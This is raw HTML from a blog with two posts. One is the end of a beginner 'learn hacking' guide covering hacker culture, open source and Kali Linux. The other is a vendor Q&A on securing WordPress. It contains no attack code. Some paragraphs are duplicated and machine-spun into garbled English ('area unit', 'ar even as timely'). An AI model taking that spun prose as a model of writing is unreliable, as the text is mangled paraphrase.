<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9j6HMYIPjb11ERJAp6cF_j2LdSS-yT_uh-2NVBFDkS5yVc9s1gmNg93fr_56wLjPQi5PhtoZIptUl1Ath-gQyVdNly1F8WaCLzHYKxIsX5mrC9ImcSMgHSBdjhQfkNv3bXaUfmjVPbqb/s1600/bigpreview_Computer+Brain.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Learn Algorithm" border="0" data-original-height="444" data-original-width="710" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9j6HMYIPjb11ERJAp6cF_j2LdSS-yT_uh-2NVBFDkS5yVc9s1gmNg93fr_56wLjPQi5PhtoZIptUl1Ath-gQyVdNly1F8WaCLzHYKxIsX5mrC9ImcSMgHSBdjhQfkNv3bXaUfmjVPbqb/s1600/bigpreview_Computer+Brain.jpg" title="Learn Algorithm" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Algorithm</td></tr>
</tbody></table>
</div>
No drawback ought to ever ought to be resolved double. consider it as a community within which the time of most is hackers is precious. Hackers believe sharing info may be an ethical responsibility. after you solve issues, create the data public to assist everybody solves an equivalent issue.<br />
You oughtn't to believe that you are responsible to offer all of your inventive product away, although the hackers that do are those that get the foremost respect from different hackers. It's in line with hacker values to sell enough of it to stay you in food and rent and computers.<br />
Read older items, like the "Jargon File" or "Hacker Manifesto" by The Mentor. they will be out of date relating to technical problems, however the angle and spirit ar even as timely.<br />
<br />
<br />
<h2 style="text-align: left;">
<u>Step 6: Ability to Solve Problem:</u><span style="font-weight: normal;"> </span></h2>
<div>
<span style="font-weight: normal;"> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://media.licdn.com/mpr/mpr/shrinknp_800_800/AAEAAQAAAAAAAATYAAAAJDA0YmY5ZjQ3LTAwYjYtNDJmZC04ZWMwLTRmZjQ4MzUxZWMzNw.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Problem Solving" border="0" data-original-height="306" data-original-width="460" height="424" src="https://media.licdn.com/mpr/mpr/shrinknp_800_800/AAEAAQAAAAAAAATYAAAAJDA0YmY5ZjQ3LTAwYjYtNDJmZC04ZWMwLTRmZjQ4MzUxZWMzNw.jpg" title="Problem Solving" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">problem Solving</td></tr>
</tbody></table>
</span></div>
<div>
<div>
No drawback ought to ever get to be solved doubly. consider it as a community within which the time of most is hackers is precious. Hackers believe sharing data could be an ethical responsibility. after you solve issues, create the knowledge public to assist everybody solves an equivalent issue.</div>
<div>
You don't get to believe that you are beholden to allow all of your artistic product away, tho' the hackers that do are those that get the foremost respect from different hackers. It's in line with hacker values to sell enough of it to stay you in food and rent and computers.</div>
<div>
Read older items, like the "Jargon File" or "Hacker Manifesto" by The Mentor. they'll be out of date concerning technical problems, however the angle and spirit ar even as timely.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
<u>Step 7: Write open-source software/codes</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://image.slidesharecdn.com/opensourcesoftwaredevelopment-160923145842/95/open-source-software-development-14-638.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="479" data-original-width="638" height="480" src="https://image.slidesharecdn.com/opensourcesoftwaredevelopment-160923145842/95/open-source-software-development-14-638.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Open-source Softwares</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<u><br /></u></div>
<div>
Write programs that different hackers assume area unit fun or helpful, and provides the program sources away to the full hacker culture to use. Hackerdom's most revered demigods area unit folks that have written giant, capable programs that met a widespread want and given them away so currently everybody uses them.</div>
<br />
<br />
<h2 style="text-align: left;">
<u>Steps 8: Post Articles on hacking online</u></h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ghostwriterhub.com/wp-content/uploads/2015/09/article-writing-service.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://ghostwriterhub.com/wp-content/uploads/2015/09/article-writing-service.jpg" data-original-height="533" data-original-width="800" height="425" width="640" /></a></div>
<div>
<u><br /></u></div>
<div>
Another sensible factor is to gather and filter helpful and fascinating data into websites or documents like commonly asked queries (FAQ) lists and build those offered. Maintainers of major technical FAQs get virtually the maximum amount respect as ASCII text file authors</div>
<h2 style="text-align: left;">
<u><b><br /></b></u><b><u>Step 9: Serve the hacker culture itself, that isn't one thing you will be positioned to try till you have been around for a jiffy and become well-known for one amongst the four previous things</u></b></h2>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blog.finjan.com/wp-content/uploads/2017/03/Hacking-Techniques.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="hacking" border="0" data-original-height="318" data-original-width="450" height="452" src="https://blog.finjan.com/wp-content/uploads/2017/03/Hacking-Techniques.jpg" title="hacking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hacking</td></tr>
</tbody></table>
<b><u><br /></u></b></div>
The hacker culture does not have leaders, exactly, however it will have culture heroes and social group elders and historians and spokespeople. once you have been in the trenches long enough, you'll grow into one in every of these.<br />
Hackers distrust blatant ego in their social group elders, thus visibly reaching for this sort of fame is dangerous. instead of endeavor for it, you've got to position yourself, thus it drops in your lap, then be modest and gracious concerning your standing. <br />
<br />
<h2 style="text-align: left;">
<b><u>Step 10: Start With Kali Linux Penetration Testing</u></b></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.kali.org/wp-content/uploads/2016/01/kali-rolling-screenshot.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Kali Linux Screenshot" border="0" data-original-height="462" data-original-width="800" height="368" src="https://www.kali.org/wp-content/uploads/2016/01/kali-rolling-screenshot.png" title="Kali Linux penetration Testing" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kali Linux</td></tr>
</tbody></table>
<div>
I was actually about to write 9 steps to learn hacking with latest hacking guides but suddenly I came up with Kali Linux , well if you are here to learn hacking , then you must be quite familiar with Kali Linux , come on it's a all-in-one penetration suite well let's go deep into it.<br />
Kali Linux is a Debian -based Operating system which has the primary objective to serve as a Complete Penetration testing suite which is a nice platform to start learn hacking and a career in hacking . Its really easy to use Kali Linux for security auditing , security research and computer forensics . Trust me , its a arsenal for hacking but you should not depend on Kali Linux completely , yes it will help to learn the concept of various hacking and penetration stuffs but it's the best to use , after all tools cant make someone a hacker and most of them are outdated or discontinued support , so depending completely on them is useless, though it's open source , so you should grab a copy to it and either install it or run it live , so it will help you a lot for your purpose .It will also help you to learn Linux and it's bash commands .Its my suggest to give a try and I will suggest some eBooks which will help to understand various concepts of hacking .<br />
<br />
Recommended eBooks : <a href="http://opentechnation.blogspot.com/2015/10/download-free-ebook-penetration-testing.html" target="_blank">Penetration Testing</a> , <a href="http://opentechnation.blogspot.com/2015/09/kali-linux-wireless-penetration-testing.html" target="_blank">Kali Linux Wireless penetration Testing</a> , Web <a href="http://opentechnation.blogspot.com/2015/09/web-penetration-testing-with-kali-linux.html" target="_blank">Penetration Testing with Kali Linux</a> .<br />
<br />
Resources : <a href="https://www.kali.org/" target="_blank">Kali Linux </a><br />
<a href="http://wikihow.com/" target="_blank">Wikihow</a><br />
<br />
<br />
<br />
<u></u><b><u></u></b></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-57982424886028226262017-10-27T20:48:00.002+05:302017-10-27T20:48:35.089+05:30How To Secure WordPress Website(2017 updated)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtcPGvdTLCXrA9dVEbr51GosYoSymXEiTQ_46sJ7GpYZcH9giePCoTjuoQhXUCke9mH4pKAAfEEwKD0JQiIxthROeg9UVkYa6v6V1YWbGm6_3rxFoeGaM2pkkywrJ30UZnRl-gPHOZ9bmx/s1600/wordpress-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="620" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtcPGvdTLCXrA9dVEbr51GosYoSymXEiTQ_46sJ7GpYZcH9giePCoTjuoQhXUCke9mH4pKAAfEEwKD0JQiIxthROeg9UVkYa6v6V1YWbGm6_3rxFoeGaM2pkkywrJ30UZnRl-gPHOZ9bmx/s400/wordpress-security.png" width="400" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
As WordPress is the leading CMS in the Internet it also carries a high rate of risk from hackers so in this post we will discuss how to secure WordPress with best Security with or without Plugins along with various Best Practices and Tips for Various Issues and Vulnerabilities to depend from hackers </div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
So , We sat down with security expert and Incsub CTO Aaron Edwards to learn more about WordPress security and the steps administrators can take to keep their WordPress themes and plugins secure.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">1. How can I tell if my WordPress theme and plugins are secure?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
There are some great free tools like <a href="https://premium.wpmudev.org/wp-checkup/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">WP Checkup</a> that can help check your site for plugin and theme vulnerabilities. Scheduling checkups and making frequent updates can keep your site safe.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Because WordPress is open source and many of the themes and plugins are distributed under a GPN or GPL license, it is easy for themes and plugins to be “forked” and redistributed on free WordPress plugin and theme sites with additional malicious code. This added code may simply add hidden linkbacks or redirect your site. However, it could also install a virus or even expose your users to identity theft.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
These types of attacks can be avoided in five ways:</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; list-style-image: initial; list-style-position: initial; margin: 0px 1.5em 1.5em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">First, when utilizing free plugins, research the author and only download the plugin files from the author’s site or from the WordPress Plugin repository (if listed).</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Ask advice regarding the safety of a plugin or theme from a trusted WordPress community. Ask questions on support forums like <a href="http://wordpress.org/support/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">http://wordpress.org/support/</a>, <a href="http://premium.wpmudev.org/forums/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">http://premium.wpmudev.org/forums/</a> or <a href="https://poststatus.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Post Status</a>.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">If you are going to use trusted free plugins or themes, check the version compatibility listing and verify the plugin or theme is still supported and updated. Many free themes and plugins are slow to receive updates or are abandoned. Using old plugins or themes can leave you exposed to attack, especially after a security update.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">If you don’t use it, lose it. Code from plugins and themes you no longer use still leave vulnerabilities, even if they are not activated. Remove all unnecessary code, including plugins and themes that you no longer use.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">One of the best ways to protect yourself from utilizing weak or malicious code is to use paid, supported themes and plugins. Companies and communities like WPMU DEV provide 100% guaranteed, time-tested support, updates and plugins that help ensure your site is prepared to stand against attacks.</li>
</ol>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
While using trusted, well-coded plugins and themes will not protect your WordPress site against all attacks, our experience shows nearly all WordPress attacks could be stopped by simply using safe, up-to-date and well-written code.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you want to save time, setup <a href="https://premium.wpmudev.org/blog/introducing-automate/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Automate</a> updates. The Hub site manager will automatically backup and update all your plugins and themes, and uses “Safe Upgrade” technology to provide worry-free update checks and reports.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">2. How can I audit my WordPress site’s security? How often should I do this?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You can hire a security professional to do an audit, or you can use a plugin/service created by security professionals to perform an automated audit for you. In both cases, you need to make sure the person or company behind the plugin/service is trusted.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Auditing to check your site for vulnerabilities really needs to be a continuously ongoing task.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
This is why we created <a href="https://premium.wpmudev.org/project/wp-defender/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Defender</a>. It will run the initial audit of your site and offer to fix all security holes it finds. It then continually monitors your site for any further security issues that may arise.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">3. Should I use a web application firewall for my WordPress site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
While not necessarily required, a WAF can add an extra layer of security to your site and server. While there are plugins that claim to provide WAF features, they can’t protect your server itself, or prevent your site going down from the load generated by an attack. We recommend a Cloud-based managed WAF like Cloudflare or Sucuri, and properly configuring your server to prevent bypassing. They can help protect against not only specific WordPress vulnerabilities in real time, but also stop DDoS and botnet attacks from taking down your site.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">4. Do I need an SSL certificate if my site isn’t an ecommerce site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Yes, absolutely. Not only is having an SSL certificate a good security practice, but HTTPS is one of Google’s ranking signals. Back in 2014, Google called for “HTTPS everywhere” on the web in an effort to make the Internet safer, and has been encouraging website owners to switch from HTTP to HTTPS ever since.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Not everyone collects money online. Some websites collect information or have membership functionality. Without an SSL certificate, login credentials, cookies and form submissions for your site can be easily intercepted.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">5. I have multiple site admins. What should I know about access management (password strength, HTTPS)?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Use HTTPS to prevent eavesdropping during the login process. Putting define( ‘FORCE_SSL_ADMIN’, true ); in your wp-config.php file will do that for you provided you have a SSL certificate installed.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You should also consider disabling the plugin or theme editor to prevent overzealous users from editing sensitive files and potentially crashing your site. Do this by adding define( ‘DISALLOW_FILE_EDIT’, true ); to your wp-config.php file. This provides an additional layer of security if a hacker gains access to a well-privileged user account.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Encourage site admins to use a password manager with strong, random passwords, and/or use a plugin like Defender to require two-factor authentication for specific roles.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">6. How can I scan my WordPress site for vulnerabilities?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
There are a number of tools out there to scan your site for vulnerabilities. Earlier I mentioned our WordPress Checkup tool and also our security plugin Defender. Both are available for free. WP Checkup provides a black-box scan and overview of your site’s performance, security and SEO, while Defender will go more in-depth with security scanning and offer to fix the issues for you.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
For more on how to scan your site, we’ve got a great <a href="https://premium.wpmudev.org/blog/security-scanning/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">guide</a> on our blog.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">7. I’m a small business. Why would hackers bother with my site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Hackers aren’t necessarily interested in you. In fact, it’s very unlikely (unless you are a large corporation or government agency) that hackers are targeting <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">you</em> specifically at all.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Instead, they are looking for sites they can hack in order to run phishing scams, malicious redirects or even to try to game Google by inserting links.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Our members often contact our support team after activating Defender’s IP Lockouts feature. Instantly they notice a steady stream of IPs already trying to access their new website with failed login attempts and 404 errors from scanning for vulnerabilities to hijack. It’s a fairly common issue for WordPress-based websites.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">8. I’ve been hacked. What should I do next?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Make a backup of your site right away. You might be thinking, “Why? It’s already hacked.” Some hosts will delete your site immediately when they find out it has been hacked; this is to avoid anything malicious affecting the rest of the network. The only thing worse than having your site hacked is having it deleted.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Now that you have your hacked site backed up, you can focus on cleaning it up. If you know approximately when your site was hacked, restore it using a pre-hack site backup, run a security audit and fix any vulnerabilities to avoid the same hack happening again. Or just install a security plugin such as Defender that will do both the security audit and close up vulnerabilities for you, along with the important task of ongoing monitoring.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Sometimes you might not have backups, or can’t roll back far enough. In those cases, you will need to manually clean up your site, which is a bit more involved. You can learn how in our website clean-up <a href="https://premium.wpmudev.org/blog/cleaning-up-after-wordpress-hack/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">guide</a>.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">9. How important are theme and plugin updates?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Incredibly important. In fact, they are the number-one cause of WordPress hacks. Keeping them up to date should be at the top of your to-do list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
But, not everybody – especially if you have lots of sites – has time for this. It’s a pain logging into all the sites to check, and then takes forever to do.</div>
